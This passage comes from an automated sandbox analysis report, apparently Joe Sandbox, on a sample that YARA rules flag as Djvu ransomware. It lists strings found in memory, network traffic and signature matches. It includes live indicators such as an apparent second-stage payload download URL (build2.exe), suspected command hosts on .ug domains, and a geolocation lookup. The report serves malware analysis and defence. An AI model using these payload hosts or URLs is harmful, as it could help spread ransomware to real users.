            Source: TpZ10Hfjov.exe, 00000003.00000002.660310030.0000000000791000.00000004.00000020.sdmp, TpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: TpZ10Hfjov.exe, 00000003.00000002.660310030.0000000000791000.00000004.00000020.sdmp, TpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: TpZ10Hfjov.exe, 00000008.00000003.692767209.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: TpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com
            Source: TpZ10Hfjov.exe, 00000003.00000002.660310030.0000000000791000.00000004.00000020.sdmp, TpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
            Source: TpZ10Hfjov.exe, 00000008.00000003.738242544.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://docs.google.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.738242544.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://drive.google.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.738856480.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://errors.angularjs.org/1.6.4-local
            Source: TpZ10Hfjov.exe, 00000008.00000003.718962801.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.719001981.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://facebook.github.io/react/docs/error-decoder.html?invariant
            Source: TpZ10Hfjov.exe, 00000008.00000003.703866297.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=d580ab8fe35aabd7f368aa9277c8
            Source: TpZ10Hfjov.exe, 00000000.00000002.652637275.0000000004A10000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000003.00000002.658281915.0000000000400000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000006.00000002.665074291.0000000004AB0000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000007.00000002.669744021.00000000049E0000.00000040.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
            Source: TpZ10Hfjov.exe, 00000003.00000002.660310030.0000000000791000.00000004.00000020.sdmp, TpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digic
            Source: TpZ10Hfjov.exe, 00000008.00000003.692767209.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicer
            Source: TpZ10Hfjov.exe, 00000008.00000003.692767209.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert
            Source: TpZ10Hfjov.exe, 00000008.00000003.692767209.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: TpZ10Hfjov.exe, 00000003.00000002.660310030.0000000000791000.00000004.00000020.sdmp, TpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.sectigo.com0
            Source: TpZ10Hfjov.exe, 00000003.00000002.660310030.0000000000791000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.use
            Source: TpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=1&
            Source: TpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://searchads.msn.net/.cfm?&&kp=2&
            Source: TpZ10Hfjov.exe, 00000008.00000003.737963616.00000000007F6000.00000004.00000001.sdmpString found in binary or memory: http://securebiz.org/dl/build2.exe
            Source: TpZ10Hfjov.exe, 00000008.00000003.779795980.00000000007DC000.00000004.00000001.sdmpString found in binary or memory: http://securebiz.org/dl/build2.exe$run
            Source: TpZ10Hfjov.exe, 00000008.00000003.737963616.00000000007F6000.00000004.00000001.sdmpString found in binary or memory: http://securebiz.org/dl/build2.exerun
            Source: TpZ10Hfjov.exe, 00000008.00000003.702235467.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
            Source: TpZ10Hfjov.exe, 00000008.00000003.673825540.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://www.amazon.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.738685634.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738622122.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://www.ecma-international.org/ecma-262/5.1/#sec-C
            Source: TpZ10Hfjov.exe, 00000008.00000003.673985913.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://www.google.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.674012488.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://www.live.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
            Source: TpZ10Hfjov.exe, 00000008.00000003.674045133.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://www.nytimes.com/
            Source: TpZ10Hfjov.exe, TpZ10Hfjov.exe, 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
            Source: TpZ10Hfjov.exe, 00000008.00000003.674164777.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://www.reddit.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.674208862.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://www.twitter.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.674230060.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://www.wikipedia.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.738301997.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com
            Source: TpZ10Hfjov.exe, 00000008.00000003.674251727.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: http://www.youtube.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;g
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://accounts.google.com
            Source: TpZ10Hfjov.exe, 00000008.00000003.676483809.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9
            Source: TpZ10Hfjov.exe, 00000008.00000003.779795980.00000000007DC000.00000004.00000001.sdmpString found in binary or memory: https://api.2ip.ua/
            Source: TpZ10Hfjov.exe, 00000008.00000003.779795980.00000000007DC000.00000004.00000001.sdmpString found in binary or memory: https://api.2ip.ua/Z
            Source: TpZ10Hfjov.exe, TpZ10Hfjov.exe, 00000008.00000002.811793069.0000000000400000.00000040.00000001.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com
            Source: TpZ10Hfjov.exe, 00000008.00000003.739296590.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://apis.google.com/js/client.js
            Source: TpZ10Hfjov.exe, 00000008.00000003.739296590.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://castedumessaging-pa.googleapis.com/v1
            Source: TpZ10Hfjov.exe, 00000008.00000003.739361295.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.739239627.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/cr/report
            Source: TpZ10Hfjov.exe, 00000008.00000003.738539047.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
            Source: TpZ10Hfjov.exe, 00000008.00000003.739361295.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://clients6.google.com
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://consent.google.com/intro/?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.g
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://content.googleapis.com
            Source: TpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/__media__/pics/8000/70/955/fallback1.jpg
            Source: TpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/__media__/pics/8000/70/955/fallback2.jpg
            Source: TpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/__media__/pics/8000/72/941/fallback1.jpg
            Source: TpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
            Source: TpZ10Hfjov.exe, 00000008.00000003.702352740.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
            Source: TpZ10Hfjov.exe, 00000008.00000003.739239627.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738992284.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://crash.corp.google.com/samples?reportid=&q=
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B83C84637
            Source: TpZ10Hfjov.exe, 00000008.00000003.739296590.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com
            Source: TpZ10Hfjov.exe, 00000008.00000003.738539047.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738242544.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.729518150.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/document?usp=chrome_app&authuser=0
            Source: TpZ10Hfjov.exe, 00000008.00000003.729016253.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/presentation?usp=chrome_app&authuser=0
            Source: TpZ10Hfjov.exe, 00000008.00000003.738390594.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://docs.google.com/spreadsheets?usp=chrome_app&authuser=0
            Source: TpZ10Hfjov.exe, 00000008.00000003.738539047.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738242544.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.738242544.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/?usp=chrome_app
            Source: TpZ10Hfjov.exe, 00000008.00000003.738242544.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://drive.google.com/drive/settings
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://feedback.googleusercontent.com
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com;
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: TpZ10Hfjov.exe, 00000008.00000003.702507447.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=285df6c9c501a160c7a24c4f7b6c
            Source: TpZ10Hfjov.exe, 00000008.00000003.702549433.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProduction?OneDriveUpdate=4a941ab240f8b2c5ca3ca1b59b
            Source: TpZ10Hfjov.exe, 00000008.00000003.702994326.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Insiders
            Source: TpZ10Hfjov.exe, 00000008.00000003.702917046.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod
            Source: TpZ10Hfjov.exe, 00000008.00000003.703913470.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod?OneDriveUpdate=1d0fd63eadbf9134b38130e8138
            Source: TpZ10Hfjov.exe, 00000008.00000003.702507447.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod?OneDriveUpdate=33c6866dc61a418522d977bd7
            Source: TpZ10Hfjov.exe, 00000008.00000003.739185547.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://github.com/angular/material
            Source: TpZ10Hfjov.exe, 00000008.00000003.738685634.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738622122.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://hangouts.google.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.738809543.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail
            Source: TpZ10Hfjov.exe, 00000008.00000003.738809543.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://mail.google.com/mail/#settings
            Source: TpZ10Hfjov.exe, 00000008.00000003.739296590.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://meet.google.com
            Source: TpZ10Hfjov.exe, 00000008.00000003.722164796.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://mths.be/fromcodepoint
            Source: TpZ10Hfjov.exe, 00000008.00000003.739296590.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://networktraversal.googleapis.com/v1alpha
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?prid=19020392&pgid=19020380&puid=93eb0881ae9ec1db&origin=https
            Source: TpZ10Hfjov.exe, 00000008.00000003.703866297.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/19.086.0502.0006/OneDriveSetup.exe
            Source: TpZ10Hfjov.exe, 00000008.00000003.702507447.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/20.114.0607.0002/OneDriveSetup.exe
            Source: TpZ10Hfjov.exe, 00000008.00000003.738744631.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
            Source: TpZ10Hfjov.exe, 00000008.00000003.738744631.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
            Source: TpZ10Hfjov.exe, 00000003.00000002.660310030.0000000000791000.00000004.00000020.sdmp, TpZ10Hfjov.exe, 00000008.00000002.812221942.0000000000810000.00000004.00000001.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: TpZ10Hfjov.exe, 00000008.00000003.775856635.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.739061098.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chromecast/answer/2998456
            Source: TpZ10Hfjov.exe, 00000008.00000003.775856635.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.739061098.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chromecast/troubleshooter/2995236
            Source: TpZ10Hfjov.exe, 00000008.00000003.779851425.0000000000830000.00000004.00000001.sdmpString found in binary or memory: https://we.tl/t-CnI3tI6K
            Source: TpZ10Hfjov.exe, 00000008.00000003.779851425.0000000000830000.00000004.00000001.sdmpString found in binary or memory: https://we.tl/t-CnI3tI6Ktv
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.738744631.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&if=1&gl=GB&hl=en-GB&pc=s&uxe=4421
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/?gws_rd=ssl
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/?gws_rd=ssl#spf=1601450623139
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/?gws_rd=ssl2
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/css/main.v2.min.css
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/app-store-download.png
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/cursor-replay.cur
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmp, TpZ10Hfjov.exe, 00000008.00000003.702235467.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/google-play-download.png
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/thank-you/thankyou-animation.json
            Source: TpZ10Hfjov.exe, 00000008.00000003.702235467.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/favicon.ico
            Source: TpZ10Hfjov.exe, 00000008.00000003.702235467.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/favicon.ico~
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/application/x-msdownloadC:
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/zGoogle
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/search?source=hp&ei=djJ0X6TKCL6IjLsPqriogAY&q=chrome&oq=chrome&gs_lcp=CgZwc3k
            Source: TpZ10Hfjov.exe, 00000008.00000003.739100756.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/tools/feedback
            Source: TpZ10Hfjov.exe, 00000008.00000003.712748072.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com;
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion.js
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/conversion_async.js
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleadservices.com/pagead/p3p.xml
            Source: TpZ10Hfjov.exe, 00000008.00000003.738744631.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/calendar.readonly
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/cast-edu-messaging
            Source: TpZ10Hfjov.exe, 00000008.00000003.738744631.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore
            Source: TpZ10Hfjov.exe, 00000008.00000003.738744631.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/clouddevices
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/hangouts.readonly
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/meetings
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/plus.peopleapi.readwrite
            Source: TpZ10Hfjov.exe, 00000008.00000003.738744631.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
            Source: TpZ10Hfjov.exe, 00000008.00000003.738744631.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/auth/userinfo.email
            Source: TpZ10Hfjov.exe, 00000008.00000003.739296590.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/calendar/v3
            Source: TpZ10Hfjov.exe, 00000008.00000003.739296590.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.googleapis.com/hangouts/v1
            Source: TpZ10Hfjov.exe, 00000008.00000003.692685643.00000000094E0000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
            Source: TpZ10Hfjov.exe, 00000008.00000003.738992284.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com/hangouts_echo_detector/release/%
            Source: TpZ10Hfjov.exe, 00000008.00000003.739135237.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
            Source: TpZ10Hfjov.exe, 00000008.00000003.745467944.0000000002DF0000.00000004.00000001.sdmpString found in binary or memory: https://www.msn.com/spartan/dhp?locale=en-US&market=US&enableregulatorypsm=0&enablecpsm=0&ishostisol
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49733 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49741 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.4:49748 version: TLS 1.2
            Source: TpZ10Hfjov.exe, 00000007.00000002.669424140.000000000306A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

            Spam, unwanted Advertisements and Ransom Demands:

            barindex
            Yara detected Djvu RansomwareShow sources
            Source: Yara matchFile source: 6.2.TpZ10Hfjov.exe.4ab15a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.1.TpZ10Hfjov.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.TpZ10Hfjov.exe.4a115a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.TpZ10Hfjov.exe.4ab15a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.TpZ10Hfjov.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.1.TpZ10Hfjov.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.TpZ10Hfjov.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.TpZ10Hfjov.exe.49e15a0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.TpZ10Hfjov.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.TpZ10Hfjov.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.1.TpZ10Hfjov.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.TpZ10Hfjov.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.TpZ10Hfjov.exe.4a115a0.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.1.TpZ10Hfjov.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000D.00000002.701857052.0000000004A80000.00000040.00000001.sdmp, type: MEMORY
